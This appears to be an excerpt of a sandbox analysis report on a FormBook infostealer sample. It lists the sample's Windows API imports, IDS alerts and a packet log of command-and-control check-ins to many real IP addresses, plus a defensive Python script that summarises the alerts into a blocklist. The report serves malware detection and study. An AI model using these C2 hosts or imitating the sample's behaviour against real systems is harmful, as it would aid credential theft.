GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain | (map image)
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-12T00:18:31.734026+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49740 | 3.33.130.190 | 80 | TCP
2024-12-12T00:18:48.956793+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49776 | 161.97.142.144 | 80 | TCP
2024-12-12T00:18:51.613514+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49782 | 161.97.142.144 | 80 | TCP
2024-12-12T00:18:54.046754+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49789 | 161.97.142.144 | 80 | TCP
2024-12-12T00:18:56.671115+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49795 | 161.97.142.144 | 80 | TCP
2024-12-12T00:19:03.680032+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49811 | 84.32.84.32 | 80 | TCP
2024-12-12T00:19:06.350235+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49817 | 84.32.84.32 | 80 | TCP
2024-12-12T00:19:09.037215+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49824 | 84.32.84.32 | 80 | TCP
2024-12-12T00:19:11.739098+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49834 | 84.32.84.32 | 80 | TCP
2024-12-12T00:19:19.281036+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49850 | 124.71.162.21 | 80 | TCP
2024-12-12T00:19:22.002152+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49856 | 124.71.162.21 | 80 | TCP
2024-12-12T00:19:24.709648+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49864 | 124.71.162.21 | 80 | TCP
2024-12-12T00:19:27.352460+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49873 | 124.71.162.21 | 80 | TCP
2024-12-12T00:19:34.784764+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49889 | 150.109.11.247 | 80 | TCP
2024-12-12T00:19:37.440962+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49896 | 150.109.11.247 | 80 | TCP
2024-12-12T00:19:40.097013+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49902 | 150.109.11.247 | 80 | TCP
2024-12-12T00:19:42.778154+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49911 | 150.109.11.247 | 80 | TCP
2024-12-12T00:19:50.045715+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49929 | 173.208.249.155 | 80 | TCP
2024-12-12T00:19:52.710837+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49935 | 173.208.249.155 | 80 | TCP
2024-12-12T00:19:55.398864+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49941 | 173.208.249.155 | 80 | TCP
2024-12-12T00:19:58.045150+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49951 | 173.208.249.155 | 80 | TCP
2024-12-12T00:20:04.998936+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49967 | 209.74.79.42 | 80 | TCP
2024-12-12T00:20:07.656869+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49974 | 209.74.79.42 | 80 | TCP
2024-12-12T00:20:10.574431+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49980 | 209.74.79.42 | 80 | TCP
2024-12-12T00:20:12.985064+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49986 | 209.74.79.42 | 80 | TCP
2024-12-12T00:20:21.003076+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50001 | 18.139.62.226 | 80 | TCP
2024-12-12T00:20:23.660886+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50002 | 18.139.62.226 | 80 | TCP
2024-12-12T00:20:26.315495+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50003 | 18.139.62.226 | 80 | TCP
2024-12-12T00:20:29.047423+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50004 | 18.139.62.226 | 80 | TCP
2024-12-12T00:20:36.572504+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50005 | 101.32.205.61 | 80 | TCP
2024-12-12T00:20:39.237742+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50006 | 101.32.205.61 | 80 | TCP
2024-12-12T00:20:41.893843+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50007 | 101.32.205.61 | 80 | TCP
2024-12-12T00:20:44.566392+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50008 | 101.32.205.61 | 80 | TCP
2024-12-12T00:20:54.154006+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50009 | 38.6.78.235 | 80 | TCP
2024-12-12T00:20:56.845702+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50010 | 38.6.78.235 | 80 | TCP
2024-12-12T00:20:59.519970+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50011 | 38.6.78.235 | 80 | TCP
2024-12-12T00:21:02.186163+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50012 | 38.6.78.235 | 80 | TCP
2024-12-12T00:21:09.175863+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50013 | 3.125.36.175 | 80 | TCP
2024-12-12T00:21:11.851422+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50014 | 3.125.36.175 | 80 | TCP
2024-12-12T00:21:14.495151+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50015 | 3.125.36.175 | 80 | TCP
2024-12-12T00:21:17.158405+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50016 | 3.125.36.175 | 80 | TCP
2024-12-12T00:21:24.143527+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50017 | 172.67.176.240 | 80 | TCP
2024-12-12T00:21:26.799915+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50018 | 172.67.176.240 | 80 | TCP
2024-12-12T00:21:29.458673+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50019 | 172.67.176.240 | 80 | TCP
2024-12-12T00:22:10.730053+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50020 | 172.67.176.240 | 80 | TCP
2024-12-12T00:22:18.180926+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50021 | 45.41.80.144 | 80 | TCP
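The alert table above shows the sample walking a list of hosts: after a single GET to 3.33.130.190, every destination from 161.97.142.144 through 172.67.176.240 receives three POST check-ins (SID 2855464) followed by one GET (SID 2855465), each on a fresh source port, and the move to the next host comes roughly every 15 seconds. As an added example that is not part of the Joe Sandbox report, the script below parses a subset of those rows (copied from the table for the first four hosts, written as pipe-separated columns) and derives that cadence, the interval between hosts, and a deduplicated destination list; the function names and summary fields are this example's own choices.

```python
"""Summarise Suricata FormBook check-in alerts per destination host.

Added example, not part of the Joe Sandbox report. ALERT_ROWS holds 13 rows
copied from the report's IDS alert table (first four destinations); the
column layout and the helper names below are this example's own.
"""
import ipaddress
import re
from collections import OrderedDict
from datetime import datetime

# Columns, in the table's order:
# Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
ALERT_ROWS = """\
2024-12-12T00:18:31.734026+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49740 | 3.33.130.190 | 80 | TCP
2024-12-12T00:18:48.956793+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49776 | 161.97.142.144 | 80 | TCP
2024-12-12T00:18:51.613514+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49782 | 161.97.142.144 | 80 | TCP
2024-12-12T00:18:54.046754+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49789 | 161.97.142.144 | 80 | TCP
2024-12-12T00:18:56.671115+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49795 | 161.97.142.144 | 80 | TCP
2024-12-12T00:19:03.680032+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49811 | 84.32.84.32 | 80 | TCP
2024-12-12T00:19:06.350235+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49817 | 84.32.84.32 | 80 | TCP
2024-12-12T00:19:09.037215+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49824 | 84.32.84.32 | 80 | TCP
2024-12-12T00:19:11.739098+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49834 | 84.32.84.32 | 80 | TCP
2024-12-12T00:19:19.281036+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49850 | 124.71.162.21 | 80 | TCP
2024-12-12T00:19:22.002152+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49856 | 124.71.162.21 | 80 | TCP
2024-12-12T00:19:24.709648+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49864 | 124.71.162.21 | 80 | TCP
2024-12-12T00:19:27.352460+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49873 | 124.71.162.21 | 80 | TCP
"""

COLUMNS = ("timestamp", "sid", "signature", "severity",
           "src_ip", "src_port", "dst_ip", "dst_port", "proto")
# The HTTP method is only visible inside the ET signature name, e.g. "... (POST) M3".
METHOD_RE = re.compile(r"\((GET|POST)\)")


def parse_alerts(text):
    """Split the pipe-separated rows into dicts; timestamps become aware datetimes."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = [f.strip() for f in line.split("|")]
        if len(fields) != len(COLUMNS):
            raise ValueError(f"expected {len(COLUMNS)} columns, got {len(fields)}: {line!r}")
        row = dict(zip(COLUMNS, fields))
        row["timestamp"] = datetime.strptime(row["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")
        match = METHOD_RE.search(row["signature"])
        row["method"] = match.group(1) if match else "UNKNOWN"
        alerts.append(row)
    return alerts


def summarize_by_destination(alerts):
    """Group alerts by destination host in first-seen order.

    Per host: the sequence of HTTP methods (the check-in cadence), the source
    ports used (one fresh connection per check-in), and the span between the
    host's first and last alert.
    """
    hosts = OrderedDict()
    for a in sorted(alerts, key=lambda r: r["timestamp"]):
        h = hosts.setdefault(a["dst_ip"], {"methods": [], "src_ports": [],
                                           "first": a["timestamp"], "last": a["timestamp"]})
        h["methods"].append(a["method"])
        h["src_ports"].append(a["src_port"])
        h["last"] = a["timestamp"]
    for h in hosts.values():
        h["pattern"] = ",".join(h["methods"])
        h["span_seconds"] = (h["last"] - h["first"]).total_seconds()
    return hosts


def host_switch_intervals(hosts):
    """Seconds between the first alert for one host and the first alert for the next."""
    firsts = [h["first"] for h in hosts.values()]
    return [(b - a).total_seconds() for a, b in zip(firsts, firsts[1:])]


def unique_destinations(alerts):
    """Deduplicated destination IPs in numeric order, ready for an IOC list."""
    return [str(ip) for ip in sorted({ipaddress.ip_address(a["dst_ip"]) for a in alerts})]


ALERTS = parse_alerts(ALERT_ROWS)

if __name__ == "__main__":
    summary = summarize_by_destination(ALERTS)
    for ip, h in summary.items():
        print(f"{ip:16} {h['pattern']:20} span={h['span_seconds']:5.2f}s "
              f"ports={','.join(h['src_ports'])}")
    print("host switch intervals (s):", [round(x, 1) for x in host_switch_intervals(summary)])
    print("destinations:", ", ".join(unique_destinations(ALERTS)))
```

Run as a script it prints one line per host; feeding parse_alerts all 46 rows of the table instead of the subset gives the same POST,POST,POST,GET pattern for every host from 161.97.142.144 through 172.67.176.240, which is a quick sanity check that the destination list really is the sample's C2 rotation before it goes into a blocklist. Keep in mind that, as the report's own "Performs DNS queries to domains with low reputation" signature implies, the hosts are resolved from a domain list, so the domains are the more durable indicator than the IPs.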
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 12, 2024 00:18:30.516129017 CET | 49740 | 80 | 192.168.2.5 | 3.33.130.190
Dec 12, 2024 00:18:30.635577917 CET | 80 | 49740 | 3.33.130.190 | 192.168.2.5
Dec 12, 2024 00:18:30.635677099 CET | 49740 | 80 | 192.168.2.5 | 3.33.130.190
Dec 12, 2024 00:18:30.643790960 CET | 49740 | 80 | 192.168.2.5 | 3.33.130.190
Dec 12, 2024 00:18:30.763384104 CET | 80 | 49740 | 3.33.130.190 | 192.168.2.5
Dec 12, 2024 00:18:31.733844995 CET | 80 | 49740 | 3.33.130.190 | 192.168.2.5
Dec 12, 2024 00:18:31.733886003 CET | 80 | 49740 | 3.33.130.190 | 192.168.2.5
Dec 12, 2024 00:18:31.734025955 CET | 49740 | 80 | 192.168.2.5 | 3.33.130.190
Dec 12, 2024 00:18:31.737024069 CET | 49740 | 80 | 192.168.2.5 | 3.33.130.190
Dec 12, 2024 00:18:31.857561111 CET | 80 | 49740 | 3.33.130.190 | 192.168.2.5
Dec 12, 2024 00:18:47.313631058 CET | 49776 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:47.435051918 CET | 80 | 49776 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:47.435345888 CET | 49776 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:47.449197054 CET | 49776 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:47.570349932 CET | 80 | 49776 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:48.956793070 CET | 49776 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:49.076514006 CET | 80 | 49776 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:49.076602936 CET | 49776 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:49.975003958 CET | 49782 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:50.094824076 CET | 80 | 49782 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:50.094984055 CET | 49782 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:50.110093117 CET | 49782 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:50.229675055 CET | 80 | 49782 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:51.613513947 CET | 49782 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:51.733659029 CET | 80 | 49782 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:51.733798981 CET | 49782 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:52.644486904 CET | 49789 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:52.763864040 CET | 80 | 49789 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:52.763969898 CET | 49789 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:52.778666973 CET | 49789 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:52.897998095 CET | 80 | 49789 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:52.898037910 CET | 80 | 49789 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:54.046468973 CET | 80 | 49789 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:54.046612024 CET | 80 | 49789 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:54.046668053 CET | 80 | 49789 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:54.046753883 CET | 49789 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:54.046909094 CET | 49789 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:54.284904957 CET | 49789 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:55.304740906 CET | 49795 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:55.424127102 CET | 80 | 49795 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:55.424264908 CET | 49795 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:55.433875084 CET | 49795 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:55.553216934 CET | 80 | 49795 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:56.670917988 CET | 80 | 49795 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:56.670947075 CET | 80 | 49795 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:56.670959949 CET | 80 | 49795 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:56.671051979 CET | 80 | 49795 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:18:56.671114922 CET | 49795 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:56.671207905 CET | 49795 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:56.675672054 CET | 49795 | 80 | 192.168.2.5 | 161.97.142.144
Dec 12, 2024 00:18:56.796274900 CET | 80 | 49795 | 161.97.142.144 | 192.168.2.5
Dec 12, 2024 00:19:02.457987070 CET | 49811 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:02.579817057 CET | 80 | 49811 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:02.579968929 CET | 49811 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:02.598135948 CET | 49811 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:02.718694925 CET | 80 | 49811 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:03.679753065 CET | 80 | 49811 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:03.680032015 CET | 49811 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:04.113233089 CET | 49811 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:04.233128071 CET | 80 | 49811 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:05.132798910 CET | 49817 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:05.252007961 CET | 80 | 49817 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:05.252170086 CET | 49817 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:05.270868063 CET | 49817 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:05.390355110 CET | 80 | 49817 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:06.350045919 CET | 80 | 49817 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:06.350234985 CET | 49817 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:06.784832001 CET | 49817 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:06.906361103 CET | 80 | 49817 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:07.819020033 CET | 49824 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:07.939280987 CET | 80 | 49824 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:07.939539909 CET | 49824 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:07.958623886 CET | 49824 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:08.079368114 CET | 80 | 49824 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:08.079404116 CET | 80 | 49824 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:09.037125111 CET | 80 | 49824 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:09.037214994 CET | 49824 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:09.472280979 CET | 49824 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:09.594629049 CET | 80 | 49824 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:10.515654087 CET | 49834 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:10.637370110 CET | 80 | 49834 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:10.637641907 CET | 49834 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:10.651905060 CET | 49834 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:10.773556948 CET | 80 | 49834 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:11.738887072 CET | 80 | 49834 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:11.738903046 CET | 80 | 49834 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:11.738919020 CET | 80 | 49834 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:11.739078999 CET | 80 | 49834 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:11.739093065 CET | 80 | 49834 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:11.739098072 CET | 49834 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:11.739108086 CET | 80 | 49834 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:11.739124060 CET | 80 | 49834 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:11.739264965 CET | 49834 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:11.739264965 CET | 49834 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:11.739656925 CET | 80 | 49834 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:11.739672899 CET | 80 | 49834 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:11.739686966 CET | 80 | 49834 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:11.739712954 CET | 49834 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:11.739801884 CET | 49834 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:11.746840954 CET | 80 | 49834 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:11.746958017 CET | 49834 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:11.748136044 CET | 49834 | 80 | 192.168.2.5 | 84.32.84.32
Dec 12, 2024 00:19:11.867935896 CET | 80 | 49834 | 84.32.84.32 | 192.168.2.5
Dec 12, 2024 00:19:17.679075003 CET | 49850 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:17.799947977 CET | 80 | 49850 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:17.800096035 CET | 49850 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:17.815320969 CET | 49850 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:17.936325073 CET | 80 | 49850 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:19.280900002 CET | 80 | 49850 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:19.280961990 CET | 80 | 49850 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:19.281035900 CET | 49850 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:19.331598997 CET | 49850 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:20.397514105 CET | 49856 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:20.518379927 CET | 80 | 49856 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:20.518501997 CET | 49856 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:20.532223940 CET | 49856 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:20.653152943 CET | 80 | 49856 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:22.001977921 CET | 80 | 49856 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:22.002048016 CET | 80 | 49856 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:22.002151966 CET | 49856 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:22.034986973 CET | 49856 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:23.085546970 CET | 49864 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:23.205087900 CET | 80 | 49864 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:23.205200911 CET | 49864 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:23.218812943 CET | 49864 | 80 | 192.168.2.5 | 124.71.162.21
